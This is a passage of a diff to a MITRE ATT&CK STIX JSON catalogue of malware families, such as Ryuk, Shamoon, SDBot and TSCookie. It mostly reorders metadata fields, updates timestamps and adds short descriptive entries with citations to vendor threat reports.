+ "id": "malware--44c75271-0e4d-496f-ae0a-a6d883a42a65",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-08T00:24:24.402Z",
+ "created": "2020-05-05T14:03:11.359Z",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Rifdoor"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0448",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0448"
+ },
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
+ "url": "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf",
+ "description": "Sherstobitoff, R., Malhotra, A., et. al.. (2018, December 18). Operation Sharpshooter Campaign Targets Global Defense, Critical Infrastructure. Retrieved May 14, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Rising Sun",
+ "description": "[Rising Sun](https://attack.mitre.org/software/S0448) is a modular backdoor malware used extensively in Operation [Sharpshooter](https://attack.mitre.org/groups/G0104). The malware has been observed targeting nuclear, defense, energy, and financial services companies across the world. [Rising Sun](https://attack.mitre.org/software/S0448) uses source code from [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Trojan Duuzer.(Citation: McAfee Sharpshooter December 2018)",
+ "id": "malware--56e6b6c2-e573-4969-8bab-783205cebbbf",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-30T03:13:38.515Z",
+ "created": "2020-05-14T22:29:25.653Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Rising Sun"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -199456,13 +228994,13 @@
],
"modified": "2020-03-30T18:05:52.348Z",
"created": "2019-07-29T14:27:18.204Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"RobbinHood"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--8ec6e3b4-b06d-4805-b6aa-af916acc2122",
@@ -199499,13 +229037,13 @@
],
"modified": "2020-03-30T18:06:39.526Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "2.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"RogueRobin"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "2.1"
},
{
"id": "malware--6b616fc1-1505-48e3-8b2c-0d19337bff38",
@@ -199533,13 +229071,13 @@
],
"modified": "2020-03-17T14:52:20.206Z",
"created": "2017-05-31T21:32:58.226Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Rover"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
@@ -199557,9 +229095,9 @@
"description": "(Citation: McAfee Gold Dragon)"
},
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"object_marking_refs": [
@@ -199569,15 +229107,59 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T18:08:03.688Z",
+ "modified": "2020-04-21T23:09:31.043Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"RunningRAT"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)",
+ "name": "Ryuk",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0446",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0446"
+ },
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ },
+ {
+ "source_name": "FireEye Ryuk and Trickbot January 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020."
+ },
+ {
+ "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
+ "source_name": "FireEye FIN6 Apr 2019"
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-18T21:37:40.600Z",
+ "created": "2020-05-13T20:14:53.171Z",
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Ryuk"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--66b1dcde-17a0-4c7b-95fa-b08d430c2131",
@@ -199605,13 +229187,52 @@
],
"modified": "2020-03-20T18:28:45.114Z",
"created": "2017-05-31T21:32:55.925Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"S-Type"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--92b03a94-7147-4952-9d5a-b4d24da7487c",
+ "name": "SDBot",
+ "description": "[SDBot](https://attack.mitre.org/software/S0461) is a backdoor with installer and loader components that has been used by [TA505](https://attack.mitre.org/groups/G0092) since at least 2019.(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0461",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0461"
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-17T19:40:20.251Z",
+ "created": "2020-06-01T12:29:05.241Z",
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "SDBot"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--0998045d-f96e-4284-95ce-3c8219707486",
@@ -199643,10 +229264,44 @@
],
"modified": "2020-03-30T18:08:50.209Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SEASHARPEE"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0450",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0450"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "SHARPSTATS",
+ "description": "[SHARPSTATS](https://attack.mitre.org/software/S0450) is a .NET backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least 2019.(Citation: TrendMicro POWERSTATS V3 June 2019)",
+ "id": "malware--73c4711b-407a-449d-b269-e3b1531fe7a9",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-21T13:12:36.865Z",
+ "created": "2020-05-18T19:51:37.488Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "SHARPSTATS"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -199724,15 +229379,15 @@
],
"modified": "2020-03-30T18:09:41.437Z",
"created": "2017-05-31T21:32:42.754Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SHOTPUT",
"Backdoor.APT.CookieCutter",
"Pirpi"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--4189a679-72ed-4a89-a57c-7f689712ecf8",
@@ -199802,13 +229457,13 @@
],
"modified": "2020-03-30T18:10:33.691Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SLOWDRIFT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--3240cbe4-c550-443b-aa76-cc2a7058b870",
@@ -199840,13 +229495,13 @@
],
"modified": "2020-03-30T18:11:04.830Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SNUGRIDE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--9ca488bd-9587-48ef-b923-1743523e63b2",
@@ -199878,13 +229533,13 @@
],
"modified": "2020-03-30T18:11:45.403Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SOUNDBITE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--8b880b41-5139-4807-baa9-309690218719",
@@ -199912,13 +229567,13 @@
],
"modified": "2020-03-30T03:05:20.517Z",
"created": "2017-05-31T21:32:28.257Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SPACESHIP"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -199950,10 +229605,49 @@
],
"modified": "2020-03-30T18:12:51.198Z",
"created": "2019-06-18T18:40:33.671Z",
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"SQLRat"
+ ]
+ },
+ {
+ "id": "malware--edf5aee2-9b1c-4252-8e64-25b12f14c8b3",
+ "description": "[SYSCON](https://attack.mitre.org/software/S0464) is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. [SYSCON](https://attack.mitre.org/software/S0464) has been delivered by the [CARROTBALL](https://attack.mitre.org/software/S0465) and [CARROTBAT](https://attack.mitre.org/software/S0462) droppers.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)",
+ "name": "SYSCON",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "x_mitre_version": "1.1"
+ "external_references": [
+ {
+ "external_id": "S0464",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0464"
+ },
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ },
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-15T15:17:10.012Z",
+ "created": "2020-06-02T18:46:58.489Z",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_aliases": [
+ "SYSCON"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--96b08451-b27a-4ff6-893f-790e26393a8e",
@@ -199981,15 +229675,15 @@
],
"modified": "2020-03-30T18:13:29.169Z",
"created": "2017-05-31T21:32:48.482Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Sakula",
"Sakurel",
"VIPER"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -200036,14 +229730,14 @@
],
"modified": "2019-04-18T20:59:56.853Z",
"created": "2019-04-15T19:40:07.664Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.0",
"x_mitre_aliases": [
"SamSam",
"Samas"
],
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -200071,15 +229765,15 @@
],
"modified": "2020-03-30T18:14:02.011Z",
"created": "2017-05-31T21:32:37.767Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"SeaDuke",
"SeaDaddy",
"SeaDesk"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -200116,13 +229810,13 @@
],
"modified": "2020-03-19T19:18:10.963Z",
"created": "2019-01-30T15:27:06.404Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Seasalt"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -200148,21 +229842,27 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T18:14:30.133Z",
+ "modified": "2020-05-29T19:31:03.708Z",
"created": "2019-05-29T13:14:38.638Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"ServHelper"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
+ "created": "2017-05-31T21:33:20.223Z",
+ "modified": "2020-06-15T14:24:52.969Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"id": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Shamoon",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the \"Cutting Sword of Justice\" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) is wiper malware that was first used by an Iranian group known as the \"Cutting Sword of Justice\" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://attack.mitre.org/software/S0140) has also been seen leveraging [RawDisk](https://attack.mitre.org/software/S0364) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -200197,20 +229897,48 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "type": "malware",
- "labels": [
- "malware"
+ "x_mitre_platforms": [
+ "Windows"
],
- "modified": "2020-03-28T21:43:05.941Z",
- "created": "2017-05-31T21:33:20.223Z",
- "x_mitre_version": "2.1",
"x_mitre_aliases": [
"Shamoon",
"Disttrack"
],
+ "x_mitre_version": "2.1"
+ },
+ {
+ "id": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "name": "ShimRat",
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has been used by the suspected China-based adversary [Mofang](https://attack.mitre.org/groups/G0103) in campaigns targeting multiple countries and sectors including government, military, critical infrastructure, automobile, and weapons development. The name \"[ShimRat](https://attack.mitre.org/software/S0444)\" comes from the malware's extensive use of Windows Application Shimming to maintain persistence. (Citation: FOX-IT May 2016 Mofang)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0444",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0444"
+ },
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-29T03:39:40.754Z",
+ "created": "2020-05-12T21:28:20.934Z",
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "ShimRat"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--89f63ae4-f229-4a5c-95ad-6f22ed2b5c49",
@@ -200238,12 +229966,46 @@
],
"modified": "2020-03-18T16:17:41.437Z",
"created": "2017-05-31T21:32:13.407Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Skeleton Key"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0468",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0468"
+ },
+ {
+ "source_name": "Trend Micro Skidmap",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/",
+ "description": "Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload. Retrieved June 4, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Skidmap](https://attack.mitre.org/software/S0468) is a kernel-mode rootkit used for cryptocurrency mining.(Citation: Trend Micro Skidmap)",
+ "name": "Skidmap",
+ "id": "malware--4b68b5ea-2e1b-4225-845b-8632f702b9a0",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-26T04:03:50.568Z",
+ "created": "2020-06-09T21:23:38.995Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Skidmap"
+ ],
"x_mitre_platforms": [
- "Windows"
+ "Linux"
]
},
{
@@ -200285,14 +230047,14 @@
],
"modified": "2020-03-28T21:43:37.366Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"Smoke Loader",
"Dofoil"
],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -200324,13 +230086,13 @@
],
"modified": "2020-03-30T18:14:59.190Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Socksbot"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -200358,14 +230120,14 @@
],
"modified": "2020-03-29T16:41:33.128Z",
"created": "2019-04-17T18:43:36.156Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"SpeakUp"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
"id": "malware--2fb26586-2b53-4b9a-ad4f-2b3bcb9a2421",
@@ -200393,13 +230155,13 @@
],
"modified": "2020-03-18T15:53:57.549Z",
"created": "2017-05-31T21:32:39.606Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SslMM"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--96566860-9f11-4b6f-964d-1c924e4f24a4",
@@ -200431,16 +230193,16 @@
],
"modified": "2020-03-18T16:01:37.852Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Starloader"
+ "x_mitre_contributors": [
+ "Alan Neville, @abnev"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "Alan Neville, @abnev"
- ]
+ "x_mitre_aliases": [
+ "Starloader"
+ ],
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -200481,13 +230243,13 @@
],
"modified": "2020-03-30T18:15:28.897Z",
"created": "2019-05-14T15:05:06.630Z",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"StoneDrill",
"DROPSHOT"
- ],
- "x_mitre_version": "1.1",
- "x_mitre_platforms": [
- "Windows"
]
},
{
@@ -200520,13 +230282,13 @@
],
"modified": "2020-03-30T18:15:56.762Z",
"created": "2017-05-31T21:33:21.437Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"StreamEx"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--6a0ef5d4-fc7c-4dda-85d7-592e4dbdc5d9",
@@ -200540,9 +230302,9 @@
"external_id": "S0018"
},
{
- "url": "https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards",
+ "source_name": "Alienvault Sykipot DOD Smart Cards",
"description": "Blasco, J. (2012, January 12). Sykipot variant hijacks DOD and Windows smart cards. Retrieved January 10, 2016.",
- "source_name": "Alienvault Sykipot DOD Smart Cards"
+ "url": "https://www.alienvault.com/open-threat-exchange/blog/sykipot-variant-hijacks-dod-and-windows-smart-cards"
},
{
"url": "http://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments",
@@ -200557,15 +230319,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T18:16:28.886Z",
+ "modified": "2020-05-13T22:58:34.210Z",
"created": "2017-05-31T21:32:17.568Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Sykipot"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--04227b24-7817-4de1-9050-b7b1b57f5866",
@@ -200602,13 +230364,13 @@
],
"modified": "2020-03-30T18:17:52.697Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"SynAck"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--7f8730af-f683-423f-9ee1-5f6875a80481",
@@ -200636,13 +230398,13 @@
],
"modified": "2020-03-18T23:13:31.404Z",
"created": "2017-05-31T21:32:40.391Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Sys10"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--876f6a77-fbc5-4e13-ab1a-5611986730a3",
@@ -200675,13 +230437,13 @@
],
"modified": "2020-03-31T12:40:49.213Z",
"created": "2017-05-31T21:33:01.951Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"T9000"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a",
@@ -200713,13 +230475,13 @@
],
"modified": "2020-03-30T18:18:53.335Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"TDTESS"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--4f6aa78c-c3d4-4883-9840-96ca2f5d6d47",
@@ -200760,14 +230522,14 @@
],
"modified": "2020-03-30T18:19:25.928Z",
"created": "2017-05-31T21:33:25.209Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"TEXTMATE",
"DNSMessenger"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--85b39628-204a-48d2-b377-ec368cbcb7ca",
@@ -200803,6 +230565,53 @@
"modified": "2018-10-17T00:14:20.652Z",
"created": "2017-05-31T21:33:15.467Z"
},
+ {
+ "id": "malware--76ac7989-c5cc-42e2-93e3-d6c476f01ace",
+ "name": "TSCookie",
+ "description": "[TSCookie](https://attack.mitre.org/software/S0436) is a remote access tool (RAT) that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) in campaigns against Japanese targets.(Citation: JPCert TSCookie March 2018)(Citation: JPCert BlackTech Malware September 2019). [TSCookie](https://attack.mitre.org/software/S0436) has been referred to as [PLEAD](https://attack.mitre.org/software/S0435) though more recent reporting indicates a separation between the two.(Citation: JPCert PLEAD Downloader June 2018)(Citation: JPCert BlackTech Malware September 2019)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0436",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0436"
+ },
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ },
+ {
+ "source_name": "JPCert BlackTech Malware September 2019",
+ "url": "https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html",
+ "description": "Tomonaga, S.. (2019, September 18). Malware Used by BlackTech after Network Intrusion. Retrieved May 6, 2020."
+ },
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-07-07T14:05:07.519Z",
+ "created": "2020-05-06T15:43:49.556Z",
+ "x_mitre_contributors": [
+ "Tatsuya Daitoku, Cyber Defense Institute, Inc."
+ ],
+ "x_mitre_platforms": [
+ "Windows"
